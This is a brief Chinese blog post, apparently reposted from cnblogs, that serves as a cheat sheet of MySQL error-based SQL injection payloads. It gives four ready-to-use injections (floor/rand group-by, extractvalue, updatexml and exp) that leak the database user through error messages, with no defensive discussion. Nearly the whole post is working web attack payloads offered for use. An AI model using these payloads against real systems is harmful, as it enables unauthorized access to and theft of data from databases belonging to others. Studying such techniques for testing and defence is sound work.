sql报错注入

2017-07-12  本文已影响0人  sum3mer

转自:http://www.cnblogs.com/Dleo/p/5493782.html

~全部都以查user()为例子~

1.floor()

id = 1 and (select 1 from  (select count(*),concat(user(),floor(rand(0)*2))x from  information_schema.tables group by x)a)

2.extractvalue()

id = 1 and (extractvalue(1, concat(0x5c,(select user()))))

3.updatexml()

id = 1 and (updatexml(0x3a,concat(1,(select user())),1))

4.exp()

id =1 and EXP(~(SELECT * from(select user())a))

上一篇 下一篇

猜你喜欢

热点阅读